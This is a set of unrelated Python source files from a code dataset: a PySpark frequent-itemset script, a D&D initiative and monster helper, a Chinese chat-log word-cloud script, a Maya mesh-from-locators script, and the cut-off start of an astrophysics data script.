count_frequent_itemset(data_baskets, candidate_pairs):\n \"\"\"\n count how many time each candidate item occurred in the sub baskets\n :param data_baskets: sub baskets\n :param candidate_pairs: all candidate pairs\n :return: C, v\n \"\"\"\n baskets_list = list(data_baskets)\n temp_counter = collections.defaultdict(list)\n\n for basket in baskets_list:\n max_length = len(basket)\n for index in range(1, max_length + 1):\n for pairs in combinations(basket, index):\n if pairs in set(candidate_pairs):\n temp_counter[pairs].append(1)\n\n yield [tuple((key, sum(value))) for key, value in temp_counter.items()]\n\n\ndef gen_ps_threshold(partition, support, whole_length):\n \"\"\"\n generate each partition's support threshold\n :param partition:\n :param support:\n :param whole_length: the original rdd's size\n :return: support threshold in this partition\n \"\"\"\n partition = copy.deepcopy(list(partition))\n return math.ceil(support * len(list(partition)) / whole_length), partition\n\n\ndef reformat(itemset_data):\n \"\"\"\n reformat pairs which length is 1 ('100',), -> ('100'),\n and a line break after each subset who has a same length\n :param itemset_data: a list of paris (singletons, pairs, triples, etc.)\n :return: a formatted str\n \"\"\"\n temp_index = 1\n result_str = \"\"\n for pair in itemset_data:\n if len(pair) == 1:\n result_str += str(\"(\" + str(pair)[1:-2] + \"),\")\n\n elif len(pair) != temp_index:\n result_str = result_str[:-1]\n result_str += \"\\n\\n\"\n temp_index = len(pair)\n result_str += (str(pair) + \",\")\n else:\n result_str += (str(pair) + \",\")\n\n return result_str[:-1]\n\n\ndef export_2_file(candidate_data, frequent_data, file_path):\n with open(file_path, 'w+') as output_file:\n str_result = 'Candidates:\\n' + reformat(candidate_data) + '\\n\\n' \\\n + 'Frequent Itemsets:\\n' + reformat(frequent_data)\n output_file.write(str_result)\n output_file.close()\n\n\nif __name__ == '__main__':\n start = time.time()\n case_number = \"2\" # 1 for Case 1 and 2 for Case 2\n support_threshold = \"9\"\n input_csv_path = \"../data/small2.csv\"\n output_file_path = \"../out/output6.txt\"\n\n # case_number = sys.argv[1] # 1 for Case 1 and 2 for Case 2\n # support_threshold = sys.argv[2]\n # input_csv_path = sys.argv[3]\n # output_file_path = sys.argv[4]\n partition_number = 2\n\n sc = SparkContext.getOrCreate()\n\n raw_rdd = sc.textFile(input_csv_path, partition_number)\n # skip the first row => csv header\n header = raw_rdd.first()\n data_rdd = raw_rdd.filter(lambda line: line != header)\n whole_data_size = None\n basket_rdd = None\n\n if 1 == int(case_number):\n # frequent businesses market-basket model\n basket_rdd = data_rdd.map(lambda line: (line.split(',')[0], line.split(',')[1])) \\\n .groupByKey().map(lambda user_items: (user_items[0], sorted(list(set(list(user_items[1])))))) \\\n .map(lambda item_users: item_users[1])\n\n elif 2 == int(case_number):\n # frequent user market-basket model\n basket_rdd = data_rdd.map(lambda line: (line.split(',')[1], line.split(',')[0])) \\\n .groupByKey().map(lambda item_users: (item_users[0], sorted(list(set(list(item_users[1])))))) \\\n .map(lambda item_users: item_users[1])\n\n # implement SON Algorithm\n # phrase 1 subset of data -> (F,1) -> distinct -> sort\n whole_data_size = basket_rdd.count()\n\n candidate_itemset = basket_rdd.mapPartitions(\n lambda partition: find_candidate_itemset(\n data_baskets=partition, original_support=int(support_threshold), whole_length=whole_data_size)) \\\n .flatMap(lambda pairs: pairs).distinct() \\\n .sortBy(lambda pairs: (len(pairs), pairs)).collect()\n\n print(candidate_itemset)\n # phrase 2 subset of data + candidate_pairs -> (C, v) -> reduceByKey(add) -> filter\n frequent_itemset = basket_rdd.mapPartitions(\n lambda partition: count_frequent_itemset(data_baskets=partition,\n candidate_pairs=candidate_itemset)) \\\n .flatMap(lambda pairs: pairs).reduceByKey(add) \\\n .filter(lambda pair_count: pair_count[1] >= int(support_threshold)) \\\n .map(lambda pair_count: pair_count[0]) \\\n .sortBy(lambda pairs: (len(pairs), pairs)).collect()\n\n print(frequent_itemset)\n export_2_file(candidate_data=candidate_itemset,\n frequent_data=frequent_itemset,\n file_path=output_file_path)\n\n print(\"Duration: %d s.\" % (time.time() - start))\n","sub_path":"ay_hw_2/python/task1_bk.py","file_name":"task1_bk.py","file_ext":"py","file_size_in_byte":9759,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"10421892","text":"from random import randint\r\nfrom os import path\r\nfrom operator import itemgetter\r\nfrom functions import input_num, input_str, XdY_Z_roller, input_question\r\nfrom pickle import dump, load\r\nfrom fractions import Fraction\r\ndir_path = path.dirname(path.realpath(__file__))\r\n\r\n#Made by badooga. Requires functions.py found at https://github.com/badooga/Python-Files\r\n\r\ndef save(mod_dict, monster_dict):\r\n with open(dir_path + \"\\\\dm_data.p\", \"wb\") as f:\r\n data = [mod_dict, monster_dict]\r\n dump(data, f)\r\n\r\ntry:\r\n with open(dir_path + \"\\\\dm_data.p\", \"rb\") as f:\r\n data = load(f)\r\n modifiers = data[0]\r\n monsters = data[1]\r\n\r\nexcept:\r\n print(\"Data file not found. Commencing setup.\")\r\n num_players = input_num(\"How many players does your party have? \", int, 1)\r\n modifiers = {}\r\n monsters = {}\r\n for player in range(num_players):\r\n player_name = input_str(\"Player {} Name: \".format(player + 1), True).rstrip()\r\n player_mod = input_num(\"Player {} Initiative Modifier: \".format(player + 1), int)\r\n modifiers[player_name] = player_mod\r\n save(modifiers, monsters)\r\n\r\ndef entercombat(mod_dict):\r\n global monsters\r\n initiative = {}\r\n num_enemygroups = input_num(\"\\nHow many non-player factions, enemy groups, or individual NPCs are present in combat? \", int, 0)\r\n if num_enemygroups != 0:\r\n for enemygroup in range(num_enemygroups):\r\n enemygroup_name = input_str(\"Faction/Enemy/NPC {} Name: \".format(enemygroup + 1), True).rstrip()\r\n if enemygroup_name in monsters.keys():\r\n enemygroup_mod = monsters[enemygroup_name][\"Initiative Modifier\"]\r\n print(enemygroup_name + \" loaded from Monster Helper.\")\r\n else:\r\n enemygroup_mod = input_num(\"Faction/Enemy/NPC {} Initiative Modifier: \".format(enemygroup + 1), int)\r\n initiative[enemygroup_name] = randint(1,20) + enemygroup_mod\r\n\r\n if mod_dict != {}:\r\n for player in mod_dict.keys():\r\n initiative[player] = randint(1, 20) + mod_dict[player]\r\n \r\n tracker = sorted([(k,v) for k,v in initiative.items()], key=itemgetter(1), reverse=True)\r\n print(\"\\nInitiative Order:\")\r\n for pair in tracker:\r\n print(\"{}: {}\".format(pair[0], pair[1]))\r\n \r\n\r\ndef editplayer(mod_dict):\r\n while True:\r\n if mod_dict == {}:\r\n print(\"\\nYou have no players saved.\")\r\n break\r\n \r\n ecommand = input_num(\"\\nWould you like to edit a player's initiative modifier (1) or a player's name (2)? (enter 0 to cancel): \", int)\r\n if ecommand == 0:\r\n break\r\n\r\n elif ecommand == 1:\r\n while True:\r\n player_mod_edit = input_str(\"What player's modifier would you like to edit (enter 0 to cancel)? \", True).rstrip()\r\n if player_mod_edit == \"0\":\r\n break\r\n elif player_mod_edit not in mod_dict.keys():\r\n print(\"Invalid player. Please try again.\")\r\n else:\r\n player_mod_new = input_num(\"New Initiative Modifier: \", int)\r\n mod_dict[player_mod_edit] = player_mod_new\r\n print(\"\\nEdit saved!\")\r\n break\r\n break\r\n \r\n elif ecommand == 2:\r\n while True:\r\n player_name_edit = input_str(\"What player's name would you like to edit (enter 0 to cancel)? \", True).rstrip()\r\n if player_name_edit == \"0\":\r\n break\r\n elif player_name_edit not in mod_dict.keys():\r\n print(\"Invalid player. Please try again.\")\r\n else:\r\n while True:\r\n player_name_new = input_str(\"New Player Name: \", True).rstrip()\r\n if player_name_new in mod_dict.keys():\r\n print(\"Name already taken. Please try again.\")\r\n else:\r\n break\r\n mod_dict[player_name_new] = mod_dict[player_name_edit]\r\n del mod_dict[player_name_edit]\r\n print(\"\\nEdit saved!\")\r\n break\r\n break\r\n\r\n else:\r\n print(\"Invalid command. Please try again.\")\r\n\r\ndef addordeleteplayer(mod_dict):\r\n command = input_num(\"\\nWould you like to add a player or players (1), or would you like to delete a player (2) (enter 0 to cancel)? \", int)\r\n while True:\r\n if command == 0:\r\n break\r\n\r\n elif command == 1:\r\n num_players_add = input_num(\"How many players would you like to add (enter 0 to cancel)? \", int, 0)\r\n if num_players_add == 0:\r\n pass\r\n else:\r\n for player in range(num_players_add):\r\n while True:\r\n player_name_add = input_str(\"Player {} Name: \".format(player + 1), True).rstrip()\r\n if player_name_add in mod_dict.keys():\r\n print(\"Player already exists.\")\r\n elif player_name_add == \"\":\r\n print(\"Invalid name. Please try again.\")\r\n else:\r\n break\r\n player_mod_add = input_num(\"Player {} Initiative Modifier: \".format(player + 1), int)\r\n mod_dict[player_name_add] = player_mod_add\r\n if num_players_add == 1:\r\n print(\"\\nPlayer saved!\")\r\n elif num_players_add > 1:\r\n print(\"\\Players saved!\")\r\n break\r\n\r\n elif command == 2:\r\n while True:\r\n if mod_dict == {}:\r\n print(\"\\nYou have no players saved.\")\r\n break\r\n\r\n player_del = input_str(\"What player would you like to delete (enter 0 to cancel)? \", True)\r\n if player_del == \"0\":\r\n break\r\n elif player_del not in mod_dict.keys():\r\n print(\"Invalid player. Please try again.\")\r\n else: \r\n if input_question(\"Are you sure you want to delete {} from the list of players (Y/N)? \".format(player_del), [\"y\", \"n\"]) == \"y\":\r\n del mod_dict[player_del]\r\n print(\"\\nPlayer successfully deleted.\")\r\n break\r\n break\r\n\r\n else:\r\n print(\"Invalid command. Please try again.\")\r\n\r\ndef initiative_roller():\r\n while True:\r\n ccommand = input_num(\"\\nInitiative Commands: Enter Combat (1), Print Player Modifiers (2), Edit Player (3), Add or Delete Players (4)\\nCommand (enter 0 to cancel): \", int)\r\n if ccommand == 0:\r\n break\r\n elif ccommand == 1:\r\n entercombat(modifiers)\r\n break\r\n elif ccommand == 2:\r\n if modifiers == {}:\r\n print(\"\\nYou have no players saved.\")\r\n else:\r\n print(\"\")\r\n print(modifiers)\r\n break\r\n elif ccommand == 3:\r\n editplayer(modifiers)\r\n if modifiers != {}:\r\n save(modifiers, monsters)\r\n elif ccommand == 4:\r\n addordeleteplayer(modifiers)\r\n if modifiers != {}:\r\n save(modifiers, monsters)\r\n else:\r\n print(\"Invalid command. Please try again.\")\r\n\r\ndef addordeletemonster():\r\n global monsters\r\n while True:\r\n add_or_delete = input_num(\"Would you like to add a monster (1), or would you like to delete a monster (2) (enter 0 to cancel)? \", int)\r\n if add_or_delete == 0:\r\n break\r\n elif add_or_delete == 1:\r\n while True:\r\n monster_name = input_str(\"Monster name: \", True)\r\n if monster_name in monsters.keys():\r\n print(\"Monster already exists. Please try again.\")\r\n else:\r\n monsters[monster_name] = {}\r\n m = monsters[monster_name]\r\n break\r\n\r\n m[\"Challenge Rating\"] = Fraction(input_num(\"Challenge Rating: \"))\r\n m[\"Hit Points\"] = input_num(\"Hit Points: \", int)\r\n m[\"Armor Class\"] = input_num(\"Armor Class: \", int)\r\n m[\"Initiative Modifier\"] = input_num(\"Initiative Modifier: \", int)\r\n m[\"Stats\"] = input_str(\"Stats (ability scores, saves, modifiers, etc) that you find important: \", True)\r\n m[\"Features\"] = input_str(\"Features (resistances, passive abilities, speed, etc), that you find important: \", True)\r\n m[\"Description\"] = input_str(\"Description (tactics, lore, behavior, etc) that you find important: \", True)\r\n if input_question(\"Does this monster have Multiattack (Y/N)? \", [\"y\", \"n\"]) == \"y\":\r\n m[\"Multiattack\"] = input_str(\"Multiattack description: \", True)\r\n else:\r\n m[\"Multiattack\"] = False\r\n num_actions = input_num(\"How many available actions (including attacks) does your monster have? \", int, 1)\r\n m[\"Actions\"] = {}\r\n for a in range(num_actions):\r\n while True:\r\n action_name = input_str(\"Action {} Name: \".format(a + 1), True)\r\n if action_name in m[\"Actions\"]:\r\n print(\"Action already exists. Please try again.\")\r\n else:\r\n break\r\n action_desc = input_str(\"Action {} Description: \".format(a + 1), True)\r\n m[\"Actions\"][action_name] = action_desc\r\n print(\"\\nMonster saved!\")\r\n\r\n elif add_or_delete == 2:\r\n while True:\r\n if monsters == {}:\r\n print(\"\\nYou have no monsters saved.\")\r\n break\r\n monster_del = input_str(\"What monster would you like to delete (enter 0 to cancel)? \", True)\r\n if monster_del == \"0\":\r\n break\r\n elif monster_del not in monsters.keys():\r\n print(\"Invalid monster. Please try again.\")\r\n else: \r\n if input_question(\"Are you sure you want to delete {} from the list of monsters (Y/N)? \".format(monster_del), [\"y\", \"n\"]) == \"y\":\r\n del monsters[monster_del]\r\n print(\"\\nMonster successfully deleted.\")\r\n break\r\n else:\r\n print(\"Invalid command. Please try again.\")\r\n continue\r\n break\r\n\r\n\r\ndef editmonster():\r\n global monsters\r\n while True:\r\n if monsters == {}:\r\n print(\"\\nYou have no monsters saved.\")\r\n break\r\n monster = input_str(\"Monster to edit (enter 0 to cancel): \", True)\r\n if monster == \"0\":\r\n break\r\n elif monster not in monsters.keys():\r\n print(\"Invalid monster. Please try again.\")\r\n else:\r\n e_m_v = {\r\n \"Stats\": \"Features (resistances, passive abilities, speed, etc), that you find important: \",\r\n \"Challenge Rating\": \"Challenge Rating: \",\r\n \"Features\": \"Features (resistances, passive abilities, speed, etc), that you find important: \",\r\n \"Description\": \"Description (tactics, lore, behavior, etc) that you find important: \",\r\n \"CR\": \"Challenge Rating: \",\r\n }\r\n \r\n m = monsters[monster]\r\n print_monsters(2, monster)\r\n print(\"\")\r\n while True:\r\n m_edit = input_str(\"What value would you like to edit (enter 0 to cancel)? \", True)\r\n m_e = m_edit.lower().title()\r\n if m_e == \"0\":\r\n break\r\n\r\n abbreviations = {\r\n \"Cr\": \"Challenge Rating\",\r\n \"Hp\": \"Hit Points\",\r\n \"Health\": \"Hit Points\",\r\n \"Ac\": \"Armor Class\",\r\n \"Initiative Mod\": \"Initiative Modifier\",\r\n \"Init Mod\": \"Initiative Modifier\",\r\n \"Initiative\": \"Initiative Modifier\",\r\n \"Init\": \"Initiative Modifier\",\r\n \"Initiative Bonus\": \"Initiative Modifier\",\r\n \"Init Bonus\": \"Initiative Modifier\",\r\n \"Bonus To Initiative\": \"Initiative Modifier\",\r\n \"Plus To Initiative\": \"Initiative Modifier\",\r\n }\r\n if m_e in abbreviations.keys():\r\n m_e = abbreviations[m_e]\r\n\r\n if m_e in [x.lower().title() for x in m[\"Actions\"].keys()]:\r\n while True:\r\n new_action_desc = input_str(\"New {} Description: \".format(m_e), True)\r\n if new_action_desc == m[\"Actions\"][m_e]:\r\n print(\"New description matches old description. Please try again.\")\r\n else:\r\n m[\"Actions\"][m_e] = new_action_desc\r\n monsters[monster] = m\r\n print(\"\\nEdit saved!\")\r\n break\r\n break\r\n\r\n elif m_e == \"Name\":\r\n while True:\r\n m_name = input_str(\"New Monster Name: \", True)\r\n if m_name == monster:\r\n print(\"New name matches old name. Please try again.\")\r\n else:\r\n v = monsters.pop(monster)\r\n monsters[m_name] = v\r\n print(\"\\nEdit saved!\")\r\n break\r\n break \r\n\r\n elif m_e in [y.lower().title() for y in m.keys()] and m_e != \"Actions\":\r\n if m_e == \"Challenge Rating\":\r\n m[m_e] = Fraction(input_num(\"Challenge Rating: \"))\r\n elif m_e in [\"Hit Points\", \"Armor Class\", \"Initiative Modifier\"]:\r\n m[m_e] = input_num(m_e + \": \", int)\r\n else:\r\n m[m_e] = input_str(e_m_v[m_e], True)\r\n monsters[monster] = m\r\n print(\"\\nEdit saved!\")\r\n break\r\n \r\n else:\r\n print(\"Invalid data value. Please try again.\")\r\n break\r\n\r\ndef print_monsters(list_or_stat, jumptoprint=False):\r\n global monsters\r\n if monsters == {}:\r\n print(\"\\nYou have no monsters saved.\")\r\n\r\n elif list_or_stat == 1:\r\n while True:\r\n monster_key = input_num(\"Would you like to sort your monsters by CR (1) or by name (2)? \")\r\n if monster_key not in [1,2]:\r\n print(\"Invalid command. Please try again.\")\r\n continue\r\n break\r\n\r\n if monster_key == 1:\r\n print_monsters = sorted(monsters.keys(), key=lambda k: monsters[k][\"Challenge Rating\"])\r\n elif monster_key == 2:\r\n print_monsters = sorted(monsters.keys())\r\n\r\n print(\"\")\r\n for monster_name in print_monsters:\r\n print(monster_name + \": CR {}\".format(monsters[monster_name][\"Challenge Rating\"]))\r\n\r\n elif list_or_stat == 2:\r\n while True:\r\n if jumptoprint:\r\n monster_to_print = jumptoprint\r\n else:\r\n monster_to_print = input_str(\"What monster's stats would you like to print? \", True)\r\n if monster_to_print not in monsters.keys():\r\n print(\"Monster not found. Please try again.\")\r\n continue\r\n break\r\n m = monsters[monster_to_print]\r\n print(\"\\n\" + monster_to_print + \": CR {}\".format(m[\"Challenge Rating\"]))\r\n if m[\"Initiative Modifier\"] < 0:\r\n print(\"{} HP, {} AC, {} to Initiative Rolls\".format(m[\"Hit Points\"], m[\"Armor Class\"], m[\"Initiative Modifier\"]))\r\n else:\r\n print(\"{} HP, {} AC, +{} to Initiative Rolls\".format(m[\"Hit Points\"], m[\"Armor Class\"], m[\"Initiative Modifier\"]))\r\n print(\"\\nStats: \" + m[\"Stats\"])\r\n print(\"Description: \" + m[\"Description\"])\r\n print(\"\\nActions\")\r\n if m[\"Multiattack\"]:\r\n print(\"Multiattack: \" + m[\"Multiattack\"])\r\n for a in m[\"Actions\"].keys():\r\n print(\"{}: {}\".format(a, m[\"Actions\"][a]))\r\n\r\ndef monster_helper():\r\n while True:\r\n mcommand = input_num(\"\\nMonster Helper Commands: Print Monster List (1), Print Monster Stats (2), Edit Monster (3), Add or Delete Monster (4), Help (5)\\nCommand (enter 0 to cancel): \", int)\r\n if mcommand == 0:\r\n break\r\n elif mcommand == 1:\r\n print_monsters(1)\r\n break\r\n elif mcommand == 2:\r\n print_monsters(2)\r\n break\r\n elif mcommand == 3:\r\n editmonster()\r\n if monsters != {}:\r\n save(modifiers, monsters)\r\n elif mcommand == 4:\r\n addordeletemonster()\r\n if monsters != {}:\r\n save(modifiers, monsters)\r\n elif mcommand == 5:\r\n print(\"\\nYou can use the Monster Helper to access the bare essentials of a D&D 5e monster's stat block for use on the fly.\\nTo do this, add your own monster via the 'add or delete monsters' command.\\nThe Monster Helper will also work with the Initiative Roller - if you input the name of a saved monster when\\nentering combat with the Initiative Roller, it will automatically use the saved monster's initiative.\")\r\n else:\r\n print(\"Invalid command. Please try again.\")\r\n\r\ndef misc():\r\n global monsters\r\n global modifiers\r\n while True:\r\n micommand = input_num(\"\\nMisc Commands: Conditions and Effects (1), Common Spells (2), Delete Player or Monster Data (3)\\nCommand (enter 0 to cancel): \")\r\n if micommand == 0:\r\n break\r\n elif micommand == 1:\r\n print(\"\\nBelow is a list listing the effects of each condition in 5e.\\n\\nBlinded: Fails sight perception checks, adv. to hit them, disadv. for them to hit\")\r\n print(\"\\nCharmed: Can't harm the charmer, charmer has adv. on social interaction checks with them\")\r\n print(\"\\nCovered: 1/2 Cover = +2 AC and Dex Saves, 3/4 Cover = +5 AC and Dex Saves\")\r\n print(\"\\nFrightened: Disadv. on checks and attacks when source is seen, can't get closer to source\")\r\n print(\"\\nGrappled: 0 speed (grappler 1/2 speed), action for escape contest\")\r\n print(\"\\nHidden: Perception to discover hider, can't normally hide in combat (e.x. except when invisible), adv. on next hit\")\r\n print(\"\\nIncapacitated: No actions or reactions\")\r\n print(\"\\nInvisible: Disadv. to hit them, adv. for them to hit, has to take action to Hide\")\r\n print(\"\\nParalyzed: Incapacitated, 0 speed, fails str/dex saves, adv. to hit from range, autocrit in melee\")\r\n print(\"\\nPetrified: Items transform too, incapacitated, oblivious to world, adv. to hit them, resistance to all damage\")\r\n print(\"\\nPoisoned: Disadv. on attacks and checks\")\r\n print(\"\\nProne: 1/2 speed crawl, 1/2 movement to get up, disadv. for them to hit and to hit them from range, adv. to hit them in melee\")\r\n print(\"\\nRestrained: 0 speed, adv. to hit them, disadv. for them to hit, disadv. on dex saves\")\r\n print(\"\\nStunned: 0 speed, incapacitated, fails str/dex saves, adv. to hit them\")\r\n print(\"\\nSurprised: No surprise round - individuals that are surprised are incapacitated until next round\")\r\n print(\"\\nUnconscious: Same as paralyzed, falls prone, is unaware of surroundings\")\r\n print(\"\\nExhausted: Disadv. on checks => 1/2 speed => disadv. on everything => 1/2 max HP => 0 speed => death\\nExhaustion effects stack, -1 exhaustion per long rest\")\r\n break\r\n\r\n elif micommand == 2:\r\n print(\"\\nBelow is a list outlining the effects of a few common spells in 5e. 'X' = spell level\")\r\n print(\"\\nCantrips - X starts at 1, goes up at char. level 5/11/17\")\r\n print(\"Fire Bolt: 120ft attack roll, xd10 fire damage\")\r\n print(\"Vicious Mockery: 60ft, wis save, Xd4 psychic damage and disadv. on next attack\")\r\n print(\"Mage Hand: 30ft from caster, action to use, 30ft movement, 10 pound carry limit\\nArcane Trickster Mage Hand: invis hand, stow or pickpocket, Thieves' Tools, Cunning Action to use, Sleight of Hand vs Perception\")\r\n print(\"Eldritch Blast: 120ft attack roll, X shots of 1d10 force\")\r\n print(\"\\n1st Level Spells\")\r\n print(\"Magic Missile: 2 + X darts (1d4 + 1 force each), can be blocked with Shield\")\r\n print(\"Cure Wounds: touch, heal for Xd8 + ability mod\")\r\n print(\"Command: 60ft wis save on X creatures in 30ft aoe, targets must understand one word command, no direct harm, done on next turn\")\r\n print(\"Healing Word: bonus action 60ft, Xd4 + ability mod heal on 1 creature\")\r\n print(\"Shield: +5 AC reaction to hits or Magic Missile; blocks Magic Missile\")\r\n print(\"Guiding Bolt: 120ft attack roll, (3 + X)d6 radiant, next attacker gets adv. before end of your next turn\")\r\n print(\"\\n2nd Level Spells\")\r\n print(\"Darkness: 15ft sphere on non-worn/carried object or a point, everyone inside is Blinded\")\r\n print(\"Hold Person: 60ft wis save on (X - 1) creatures in 30ft aoe, paralyzed on fail, repeat saves on turn ends\")\r\n print(\"Spiritual Weapon: bonus action 60ft concentration, spell attack for (X - 1)d8 + ability mod, bonus action for 20ft move and attack, attacks on summon\")\r\n print(\"Scorching Ray: 120ft attack roll, (X + 1) shots of 2d6 fire\")\r\n print(\"\\n3rd Level Spells\")\r\n print(\"Counterspell: reaction, interrupt spells X level or lower, spellcasting ability check (DC 10 + their spell level) to beat higher level spells\")\r\n print(\"Mass Healing Word: bonus action 60ft, (X - 2)d4 + ability mod heal on 6 creatures\")\r\n print(\"Revivify: 300gp diamond (consumed), touch to undo a non-natural death that happened within 1 min of casting, comes back with 1 HP\")\r\n print(\"\\n4th Level Spells\")\r\n print(\"Banishment: 60ft concentration wis save on (X - 3) creatures, fail sends incapacitated targets to demiplane, they return in 1 min, if the spell isn't interrupted after 1 min they don't return if they are not native to current plane\")\r\n print(\"Fire Shield: 10min, caster gets resistance to cold or fire, melee attackers take 2d8 fire or cold, respectively\")\r\n print(\"Wall of Fire: 1min, 20ft tall and 1ft thick, 60ft long or 20ft diameter, dex save on appearance for (X + 1)d8 fire or half, damaging side of wall does (X + 1)d8 when entering it or ending turn within 10ft\")\r\n print(\"Polymorph: 60min concentration, unwilling targets wis save, new form is beast less than or equal to target's CR/level, extra HP pool, all stats replaced, gear melds into them\")\r\n\r\n elif micommand == 3:\r\n while True:\r\n delete = input_num(\"Would you like to delete all player data (1) or all monster data (2) (enter 0 to cancel)? \", int)\r\n if delete == 0:\r\n break\r\n elif delete == 1:\r\n if modifiers == {}:\r\n print(\"\\nThere is no player data to delete.\")\r\n elif input_question(\"This action is irreversible. Are you sure you want to delete all player data (Y/N)? \", [\"y\", \"n\"]) == \"y\":\r\n modifiers = {}\r\n save(modifiers, monsters)\r\n print(\"\\nPlayer data successfully deleted.\")\r\n break\r\n elif delete == 2:\r\n if monsters == {}:\r\n print(\"\\nThere is no monster data to delete..\")\r\n elif input_question(\"This action is irreversible. Are you sure you want to delete all monster data (Y/N)? \", [\"y\", \"n\"]) == \"y\":\r\n monsters = {}\r\n save(modifiers, monsters)\r\n print(\"\\Monster successfully deleted.\")\r\n break\r\n else:\r\n print(\"Invalid command. Please try again.\")\r\n break\r\n\r\n else:\r\n print(\"Invalid command. Please try again.\")\r\n\r\nwhile True:\r\n command = input_num(\"\\nCommands: Quit (1), Initiative Roller (2), Monster Helper (3), Dice Roller (4), Misc (5)\\nCommand: \", int)\r\n if command == 1:\r\n break\r\n elif command == 2:\r\n initiative_roller()\r\n elif command == 3:\r\n monster_helper()\r\n elif command == 4:\r\n XdY_Z_roller()\r\n elif command == 5:\r\n misc()\r\n else:\r\n print(\"Invalid command. Please try again.\")","sub_path":"Dungeons and Dragons/dm_assistant.py","file_name":"dm_assistant.py","file_ext":"py","file_size_in_byte":25091,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"263380965","text":"# -*- coding: utf-8 -*-\n# @Author: zhr\n# @Date: 2020-03-05 11:27:20\n# @Last Modified by: zhr\n# @Last Modified time: 2020-03-05 12:27:29\n# -*- coding: utf-8 -*-\n# @Author: zhr\n# @Date: 2020-03-05 08:54:47\n# @Last Modified by: zhr\n# @Last Modified time: 2020-03-05 11:26:25\nimport jieba\nimport re\nimport collections\nimport wordcloud\nfrom PIL import Image\nimport matplotlib.pyplot as plt \nimport numpy as np \n\nf1 = open(\"滚去学习(2377919782).txt\", \"r\", encoding=\"utf-8\")\nzhr_name = [\"东都大白兔\", \"name=main\", \"今天必须早睡\"]\nzyf_name = [\"18 环境 张一帆\", \"洛安。\", \"帆大讯飞\", \"小帆讯飞\", \"别找她!舔狗!\", \"别生气,别冲动,别理她\", \"快去学习\", \"滚去学习\"]\ntimepat = re.compile(r\"\\d{4}-\\d{1,2}-\\d{1,2}\")\n\nnzyf = 0\nnzhr = 0\nflag = 0\nlines = f1.readlines()\nzyf_s = []\nzhr_s = []\nfor line in lines:\n\tline = line.replace(\"[图片]\", \"\")\n\tline = line.replace(\"[表情]\", \"\")\n\tline = line.replace(\"\\n\", \"\")\n\tif flag == \"zyf\":\n\t\tzyf_s.append(line)\n\t\tflag = 0\n\tif flag == \"zhr\":\n\t\tzhr_s.append(line)\n\t\tflag = 0\n\tif re.search(timepat, line):\n\t\tfor w in zyf_name:\n\t\t\tif w in line:\n\t\t\t\tflag = \"zyf\"\n\t\t\t\tbreak\n\t\tfor w in zhr_name:\n\t\t\tif w in line:\n\t\t\t\tflag = \"zhr\"\n\t\t\t\tbreak\n\nprint(len(zhr_s))\nprint(len(zyf_s))\nprint(zhr_s[0:20])\n\nremove_words = [u'的', u',',u'和', u'是', u'随着', u'对于', u'对',u'等',u'能',u'都',u'。',u' ',u'、',u'中',u'在',u'了',\n u'通常',u'如果',u'我们',u'需要',u'我',u'你',u'?',u\"\",u\" \",u\"就\",u\"不\",\"啊\",\n u\"吧\",u\"也\",u\"不是\",u\"就是\",u\"什么\",u\"怎么\",\n u\"这个\",u\"这么\",u\"一个\"]\nk = 0\nwords = []\nfor s in zhr_s:\n\tif \"赵先生\" in s:\n\t\twords.append(\"赵先生\")\n\tk += 1\n\tthelist = jieba.cut(s, cut_all = False)\n\tfor word in thelist:\n\t\tif word not in remove_words:\n\t\t\tif len(word) > 1:\n\t\t\t\twords.append(word)\n\t\t\tif k < 20:\n\t\t\t\tprint(word)\n\nword_counts = collections.Counter(words)\nwords_top10 = word_counts.most_common(50)\nprint(words_top10)\n\nmask = np.array(Image.open(\"cloud3.jpg\"))\nwc = wordcloud.WordCloud(\n\tbackground_color=\"white\",\n\tfont_path='zi.ttf',\n\tmask=mask,\n\tmax_words=200,\n\tmax_font_size=500\n\t)\n\nwc.generate_from_frequencies(word_counts)\nimage_colors = wordcloud.ImageColorGenerator(mask)\nwc.recolor(color_func=image_colors)\nplt.imshow(wc)\nplt.axis('off')\nplt.savefig(\"zhr2.png\", dpi=300)\nplt.show()\n\n\n\n\n\n\n\n\n\n","sub_path":"QQmessages/zyf_zhr.py","file_name":"zyf_zhr.py","file_ext":"py","file_size_in_byte":2389,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"276760821","text":"import maya.cmds as cmds\nimport math as m\nsel=cmds.ls(sl=1, fl=1)\nwPos=[]\nfor each in sel:\n wPos.append(cmds.xform(each, q=1, ws=1, t=1))\ndict=zip(sel, wPos)\n\nfor src in dict:\n dist=[]\n targ=[]\n others=dict[:]\n x1=src[1][0] \n y1=src[1][1]\n z1=src[1][2]\n others.remove(src)\n for tar in others:\n x2=tar[1][0] \n y2=tar[1][1]\n z2=tar[1][2]\n xx=x1-x2\n yy=y1-y2\n zz=z1-z2\n targ.append(tar[0])\n dist.append(m.sqrt((m.pow(xx,2))+(m.pow(yy,2))+(m.pow(yy,2))))\n dist2=dist[:]\n min1=min(dist)\n dist2.remove(min1)\n min2=min(dist2)\n index1=dist.index(min(dist))\n index2=dist.index(min(dist2))\n p1=cmds.xform(src[0], q=1, ws=1, t=1)\n p2=cmds.xform(targ[index1], q=1, ws=1, t=1)\n p3=cmds.xform(targ[index2], q=1, ws=1, t=1)\n cmds.polyCreateFacet(p=[tuple(p1),tuple(p2),tuple(p3)])","sub_path":"scripts/python/maya/misc/polymeshFromLocs.py","file_name":"polymeshFromLocs.py","file_ext":"py","file_size_in_byte":878,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"244458840","text":"#!/usr/bin/env python2\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Wed Feb 22 10:56:38 2017\n\n@author: raad\n\"\"\"\n\nfrom ID12_bleeding_2comp import *\nimport gc\n\nB = 0.03\nm = 0.5\nr_i = 2.5\n#a = 0.85\nr_o=18.\n\ndata = np.genfromtxt('/home/raad/PhD/Data/Work_Dir/2compmodel21feb17/comptwo_refl_components.qdp', skip_header = 3)\n\nE_range_raw = data[:,0]\ndE_raw, F_all_raw, F_out_raw, F_in_raw, F_refl_raw = data[:,1], data[:,2], data[:,3], data[:,4], data[:,5]\nF_all_raw, F_out_raw, F_in_raw, F_refl_raw = F_all_raw/(E_range_raw), F_out_raw/(E_range_raw), F_in_raw/(E_range_raw), 